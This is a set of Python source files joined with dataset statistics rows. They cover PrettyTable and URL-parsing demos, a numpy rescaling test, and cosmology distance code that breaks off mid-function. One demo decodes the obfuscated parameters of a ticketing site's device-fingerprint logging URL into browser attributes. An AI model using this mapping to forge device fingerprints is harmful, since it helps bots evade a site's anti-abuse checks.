print('>>>sorted_table_demo<<<')
print(table)
# Sort ascending by population
sorted_table = table.get_string(sortby="Population", reversesort=False)
print('>>>Sorted ascending by population (sortby="Population", reversesort=False)<<<')
print(sorted_table)
def selected_table_demo():
'''
Select specific columns and display them.
'''
table = PrettyTable()
table.field_names = ["City name", "Area", "Population", "Annual Rainfall"]
table.add_row(["Adelaide",1295, 1158259, 600.5])
table.add_row(["Brisbane",5905, 1857594, 1146.4])
table.add_row(["Darwin", 112, 120900, 1714.7])
table.add_row(["Hobart", 1357, 205556,619.5])
print('>>>selected_table_demo<<<')
print(table)
# Keep only the selected columns
selected_table = table.get_string(fields=["Area", "Population"])
print('>>>Filtered to the columns ["Area", "Population"]<<<')
print(selected_table)
def simple_url_parse_demo():
'''
Simple demo of parsing the query parameters out of a URL.
'''
# Example GET request URL with a long query string
url_get = 'https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581465946282'
# Parse the URL, extracting the request path and the query string
path = urlparse(url_get).path
query = urlparse(url_get).query
print(">>>simple_url_parse_demo<<<")
print(path,query)
# Parse the query string into a dict
query_dict = parse_qs(query)
print(">>>query_dict<<<")
print(query_dict)
# Parse the query string into a list of (name, value) tuples
query_list = parse_qsl(query)
print(">>>query_list<<<")
print(query_list)
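# Added note: parse_qs maps each name to a *list* of values, while parse_qsl
# keeps the original order as (name, value) tuples, e.g.
#   parse_qs('a=1&b=2&a=3')  -> {'a': ['1', '3'], 'b': ['2']}
#   parse_qsl('a=1&b=2&a=3') -> [('a', '1'), ('b', '2'), ('a', '3')]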
def get_urls_with_query_params(urls):
# Collect the valid URLs
valid_urls = []
# Nothing to do for empty input
if not urls:
return valid_urls
# Strip leading/trailing whitespace, then split on newlines
urls = urls.strip().split('\n')
# Strip whitespace around each individual URL
for url in urls:
valid_url = url.strip()
if valid_url:
valid_urls.append(valid_url)
return valid_urls
def parse_urls_with_query_params(urls):
'''
Parse each valid URL and build the PrettyTable field names and row data.
'''
# Collect the valid URLs
valid_urls = get_urls_with_query_params(urls)
if not valid_urls or len(valid_urls) == 0:
return None
# Parsed query-parameter lists for every URL
origin_query_param_list = []
for valid_url in valid_urls:
# The query parameters are not necessarily identical across URLs
query = urlparse(valid_url).query
query_list = parse_qsl(query)
# Append the parsed result regardless of its content
origin_query_param_list.append(query_list)
# Field names: the union of all parameter names seen across the URLs
query_param_list = []
longest_query_param_set = set()
for origin_query_param_item in origin_query_param_list:
for origin_query_param_detail_item in origin_query_param_item:
longest_query_param_set.add(origin_query_param_detail_item[0])
query_param_list = list(longest_query_param_set)
# Row data; the column order must stay consistent with the field names!
query_value_list = []
for origin_query_param_item in origin_query_param_list:
query_value_item = []
for query_param_item in query_param_list:
has_find_valid_param_value_flag = False
for origin_query_param_detail_item in origin_query_param_item:
name = origin_query_param_detail_item[0]
value = origin_query_param_detail_item[1]
if query_param_item == name:
has_find_valid_param_value_flag = True
query_value_item.append(value)
break
# Pad missing parameters with ""
if not has_find_valid_param_value_flag:
query_value_item.append('')
query_value_list.append(query_value_item)
return query_param_list,query_value_list
def show_with_prettytable(table_names_list,table_values_list):
'''
Build a PrettyTable from field names and row data.
'''
# Pretty-print the request parameters
table = PrettyTable()
table.field_names = table_names_list
for query_values in table_values_list:
table.add_row(query_values)
return table
def show_urls_with_query_params(urls):
'''
Display the URL query parameters as a table.
'''
# Field names and row data
query_names_list,query_values_list = parse_urls_with_query_params(urls)
# Pretty-print the request parameters
table = show_with_prettytable(query_names_list,query_values_list)
print('>>>Query parameters as a table<<<')
print(table)
print()
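# Added usage sketch (illustrative URLs only):
#   show_urls_with_query_params('https://example.com/s?q=1&lang=en\n'
#                               'https://example.com/s?q=2&lang=de')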
def show_diff_urls_with_query_params(urls):
'''
Display only the query parameters whose values differ across the URLs.
'''
# Field names and row data
query_names_list,query_values_list = parse_urls_with_query_params(urls)
# Pretty-print the request parameters
table = show_with_prettytable(query_names_list,query_values_list)
print('>>>All query parameters<<<')
print(table)
print()
# Group the values of each parameter, column by column
query_param_dict = {}
for query_name_index, query_name in enumerate(query_names_list):
query_name_values = []
for query_value in query_values_list:
query_name_values.append(query_value[query_name_index])
query_param_dict[query_name] = query_name_values
# Deduplicate each column with a set to find the parameters whose values differ
exclude_query_names_list = ['timestamp']
diff_query_names_list = []
for query_param_name in query_param_dict:
diff_param_value_set = set(query_param_dict.get(query_param_name))
if len(diff_param_value_set) > 1 and (query_param_name not in exclude_query_names_list):
diff_query_names_list.append(query_param_name)
# Show only the selected (differing) columns
selected_table = table.get_string(fields=diff_query_names_list)
print('>>>Differing query parameters only<<<')
print(selected_table)
print()
def filter_diff_urls_with_query_params(urls,code_name_relation_map={}):
'''
Filter down to the differing query parameters first, then display them as a table.
'''
# Field names and row data
query_names_list,query_values_list = parse_urls_with_query_params(urls)
# Group the values of each parameter, column by column
query_param_dict = {}
for query_name_index, query_name in enumerate(query_names_list):
query_name_values = []
for query_value in query_values_list:
query_name_values.append(query_value[query_name_index])
query_param_dict[query_name] = query_name_values
# Deduplicate each column with a set to find the parameters whose values differ
diff_query_names_list = []
exclude_query_names_list = ['timestamp']
for query_param_name in query_param_dict:
diff_param_value_set = set(query_param_dict.get(query_param_name))
if len(diff_param_value_set) > 1 and (query_param_name not in exclude_query_names_list):
diff_query_names_list.append(query_param_name)
# Find the position of each differing parameter in the original field names
diff_query_names_index_list = []
for diff_query_name in diff_query_names_list:
for query_name_index, query_name in enumerate(query_names_list):
if diff_query_name == query_name:
diff_query_names_index_list.append(query_name_index)
break
# Translate the differing parameter codes into readable titles
diff_query_names_title_list = []
for diff_query_names in diff_query_names_list:
diff_query_names_title = code_name_relation_map.get(diff_query_names) or diff_query_names
diff_query_names_title_list.append(diff_query_names_title)
# Extract the data for the differing parameters
diff_query_names_data_list = []
for query_value in query_values_list:
diff_query_names_data_item_list = []
for diff_query_names_index in diff_query_names_index_list:
diff_query_names_data_item_list.append(query_value[diff_query_names_index])
diff_query_names_data_list.append(diff_query_names_data_item_list)
# Pretty-print the request parameters
table = show_with_prettytable(diff_query_names_title_list,diff_query_names_data_list)
print('>>>Differing query parameters<<<')
print(table)
print()
def main():
# Raw GET request URLs with query strings
urls = '''
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581465946282
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466048309
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466073940
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466097372
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466118828
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581466153163
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=dDNClw4tBKGU7hAZx-XpOBq5DoWF5WJ2TK8edBMLq4o&FMQw=0&q4f3=zh-CN&VySQ=FGEMmxz6TAvkuerBSuVfLd-w01fSfGxM&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581473766043
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581473820005
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581474320091
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581501834959
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581501961805
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=t8mrq_YnAbyQUU7lmiJFNOysQGlKAykjpl6Kp_R4PXw&FMQw=0&q4f3=zh-CN&VySQ=FGHCXcWAgMnEuDfL881oOTbrF1iJfANK&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581508561749
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=1vWFUu6c8X&hashCode=z2EaI5kkCkW-jslnKmsffnYfiBdVG-JaQA6zDzT4lAU&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_15_2)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/80.0.3987.87%20Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581508957149
https://kyfw.12306.cn/otn/HttpZF/logdevice?algID=MFjuxmgU5M&hashCode=Obi2jdJnLWjGFx-xg8YrzljCaNGizhOypETrKR_L1JM&FMQw=0&q4f3=zh-CN&VPIf=1&custID=133&VEek=unknown&dzuS=0&yD16=0&EOQP=c227b88b01f5c513710d4b9f16a5ce52&jp76=52d67b2a5aa5e031084733d5006cc664&hAqN=MacIntel&platform=WEB&ks0Q=d22ca0b81584fbea62237b14bd04c866&TeRS=777x1280&tOHY=24xx800x1280&Fvje=i1l1o1s1&q5aJ=-8&wNLf=99115dfb07133750ba677d055874de87&0aew=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36&E3gR=9f7fa43e794048f6193187756181b3b9×tamp=1581509113202
'''
code_name_relation_map = {
"FMQw": "adblock",
"TeRS": "scrAvailSize",
"qBVW": "appMinorVersion",
"qmyu": "scrColorDepth",
"hLzX": "userLanguage",
"j5po": "hasLiedLanguages",
"e6OK": "systemLanguage",
"5Jwy": "scrHeight",
"ks0Q": "plugins",
"kU5z": "historyList",
"Fvje": "storeDb",
"q5aJ": "timeZone",
"qT7b": "appcodeName",
"3neK": "hasLiedResolution",
"2xC5": "hasLiedBrowser",
"VEek": "doNotTrack",
"3sw-": "indexedDb",
"jp76": "mimeTypes",
"VPIf": "cookieEnabled",
"9vyE": "online",
"-UVA": "browserName",
"88tV": "scrAvailHeight",
"E-lJ": "scrAvailWidth",
"VySQ": "cookieCode",
"ci5c": "hasLiedOs",
"0aew": "userAgent",
"3jCe": "scrDeviceXDPI",
"E3gR": "webSmartID",
"Md7A": "cpuClass",
"XM7l": "localStorage",
"ssI5": "scrWidth",
"EOQP": "jsFonts",
"d435": "browserVersion",
"lEnu": "localCode",
"hAqN": "os",
"V8vl": "openDatabase",
"q4f3": "browserLanguage",
"dzuS": "flashVersion",
"tOHY": "srcScreenSize",
"yD16": "javaEnabled",
"wNLf": "touchSupport",
"HVia": "sessionStorage"
}
filter_diff_urls_with_query_params(urls,code_name_relation_map=code_name_relation_map)
if __name__ == '__main__':
main() | 58.315315 | 674 | 0.752665 | 2,372 | 19,419 | 5.950253 | 0.137015 | 0.026924 | 0.02579 | 0.017004 | 0.79205 | 0.74125 | 0.712059 | 0.705966 | 0.703202 | 0.703202 | 0 | 0.214159 | 0.127144 | 19,419 | 333 | 675 | 58.315315 | 0.618525 | 0.029301 | 0 | 0.316742 | 0 | 0.067873 | 0.581117 | 0.012204 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049774 | false | 0 | 0.013575 | 0 | 0.085973 | 0.126697 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db678c68cea96011693634cdb96bb6e2ceef39e7 | 1,556 | py | Python | testArray/testArray.py | mrkraimer/testPvaPy | 7d09095bc76bf0a86d8d664c85757ab8369485c8 | [
"MIT"
] | null | null | null | testArray/testArray.py | mrkraimer/testPvaPy | 7d09095bc76bf0a86d8d664c85757ab8369485c8 | [
"MIT"
] | 1 | 2020-07-18T19:50:51.000Z | 2020-07-19T09:58:16.000Z | testArray/testArray.py | mrkraimer/testPvaPy | 7d09095bc76bf0a86d8d664c85757ab8369485c8 | [
"MIT"
] | 2 | 2020-07-18T18:06:57.000Z | 2020-09-10T06:40:34.000Z | import numpy as np
print('first try int8')
values = (-128,-1,0,1,127)
data = np.array(values,dtype=np.int8)
print('int8=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,255.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint8)
print('uint8=',data)
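# Added note: np.interp maps [dataMin, dataMax] linearly onto the target range,
# so the int8 values (-128, -1, 0, 1, 127) above should come out as
# uint8 (0, 127, 128, 129, 255).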
print('\nnow try int16')
values = (-32768,-256,0,256,32767)
data = np.array(values,dtype=np.int16)
print('int16=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,65535.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint16)
print('uint16=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,255.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint8)
print('uint8=',data)
print('\nnow try int32')
values = (-2147483648,-65536,0,65536,2147483647)
data = np.array(values,dtype=np.int32)
print('int32=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,4294967295.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint32)
print('uint32=',data)
dataMin = int(np.min(data))
dataMax = int(np.max(data))
xp = (float(dataMin),float(dataMax))
fp = (0.0,255.0)
data = np.interp(data,xp,fp)
#print('dtype=',data.dtype,' data=',data)
data = data.astype(np.uint8)
print('uint8=',data)
| 26.827586 | 48 | 0.676093 | 264 | 1,556 | 3.984848 | 0.155303 | 0.114068 | 0.114068 | 0.076046 | 0.80038 | 0.80038 | 0.731939 | 0.731939 | 0.731939 | 0.731939 | 0 | 0.089172 | 0.091902 | 1,556 | 57 | 49 | 27.298246 | 0.655343 | 0.152956 | 0 | 0.617021 | 0 | 0 | 0.071701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021277 | 0 | 0.021277 | 0.234043 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db86af736e85f69e1c2207ea7054ba50c092dc1c | 10,014 | py | Python | euclidIR/dist.py | sdhawan21/euclidIR | 15b3e8ba1a033ac6a1d80ea1a1a33176fa0633d3 | [
"MIT"
] | null | null | null | euclidIR/dist.py | sdhawan21/euclidIR | 15b3e8ba1a033ac6a1d80ea1a1a33176fa0633d3 | [
"MIT"
] | null | null | null | euclidIR/dist.py | sdhawan21/euclidIR | 15b3e8ba1a033ac6a1d80ea1a1a33176fa0633d3 | [
"MIT"
] | null | null | null | from scipy.interpolate import interp1d
import numpy as np
rn=np.random.normal
c=2.997924562e5
def h0_sne(M, zp):
"""
Hubble constant from SNe observed in different passbands
"""
val=M+25-zp
h0=pow(10, 0.2*val)
return h0
def h0_mc(M, zp, n):
"""
Monte carlo to estimate H0 given the absolute magnitude the SNae zero point in a given filter for an Sn (with n realizations )
"""
arr=np.array([h0_sne(rn(M[0], M[1]), rn(zp[0], zp[1])) for k in range(n)])
return np.mean(arr), np.std(arr)
def h0_withcosm(dl, z, om=0.27, ol=0.73):
"""
Using the complete expression for h0 with values of omega_m and omega_lambda, for low z this approaches the nocosm value
om=0.27, ol=0.73 default
"""
q0=(om/2)-ol
a=z*(1-q0)/(np.sqrt(1+2*q0*z)+1+q0*z )
h0=(1+a)*c*z/dl
return h0
def h0_nocosm(dl, z):
return c*z/dl
def arr_crt(fil1, fil2):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string')
a2=np.loadtxt(fil2, dtype='string')
arr1=[float(i[1]) for i in a1 if i[0] in a2[:,0]]
arr2=[float(a2[a2[:,0]==i[0]][0][1]) for i in a1 if i[0] in a2[:,0] ]
return arr1, arr2
def lum_dist(z, om=0.27, ol=0.73, h0=70):
q0=(om/2)-ol
a=z*(1-q0)/(np.sqrt(1+2*q0*z)+1+q0*z )
dl=(1+a)*c*z/h0
return dl
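# Added example: with the defaults (om=0.27, ol=0.73, h0=70) this low-z
# approximation gives roughly lum_dist(0.01) ~ 43 Mpc.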
WM=0.27
WV=0.73
WK=1-WM-WV
H0=70
WR=0
c = 299792.458
def mod(z):
az = 1.0/(1+1.0*z)
age = 0
n=1000
DTT = 0.0
DCMR = 0.0
for i in range(n):
a = az+(1-az)*(i+0.5)/n
adot = np.sqrt(WK+(WM/a)+(WR/(a*a))+(WV*a*a))
DTT = DTT + 1./adot
DCMR = DCMR + 1./(a*adot)
DTT = (1.-az)*DTT/n
DCMR = (1.-az)*DCMR/n
DCMR_Mpc = (c/H0)*DCMR
ratio = 1.00
x = np.sqrt(abs(WK))*DCMR
if x > 0.1:
if WK > 0:
ratio = 0.5*(np.exp(x)-np.exp(-x))/x
else:
ratio = np.sin(x)/x
else:
y = x*x
if WK < 0: y = -y
ratio = 1. + y/6. + y*y/120.
DCMT = ratio*DCMR
DA = az*DCMT
DL = DA/(az*az)
DL_Mpc = (c/H0)*DL
mu=5*np.log10(DL_Mpc)+25
return mu
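# Added example: for the flat cosmology hard-coded above (H0=70, WM=0.27,
# WV=0.73), mod(0.01) gives a distance modulus of roughly 33.2 mag, consistent
# with lum_dist(0.01) ~ 43 Mpc since mu = 5*log10(DL_Mpc) + 25.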
"""
All array creation functions below
"""
def rev_arr_crt(fil1, fil2, n):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
nm=np.array([i[0][:-1] for i in a2])
arr1=[i[n][2:6] for i in a1 if 'SN'+i[0][:-1] in nm]
arr2=[float(a2[nm=='SN'+i[0][:-1]][0][3]) for i in a1 if 'SN'+i[0][:-1] in nm ]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
f1.append(float(arr1[k]))
f2.append(float(arr2[k]))
except:
arr1[k]
return np.array(f1), np.array(f2)
def self_arr_crt(fil1, fil2, n, n1):
"""
From two files create arrays of the parameter values for SN present in both
"""
a1=np.loadtxt(fil1, dtype='string', delimiter='&')
a2=np.loadtxt(fil2, dtype='string', delimiter='&')
#nm=np.array([i[0][:-1] for i in a2])
arr1=[i[n][2:6] for i in a1 if i[0] in a2[:,0]]
arr2=[a2[a2[:,0]==i[0]][0][n1][2:6] for i in a1 if i[0] in a2[:,0] ]
f1=[]; f2=[]
for k in range(len(arr1)):
try:
finp=float(arr1[k])
finp2=float(arr2[k])
f1.append(finp)
f2.append(finp2)
except:
arr1[k]
return np.array(f1), np.array(f2)
def dm_arr_crt(fil1, fil2, n, n1):
"""
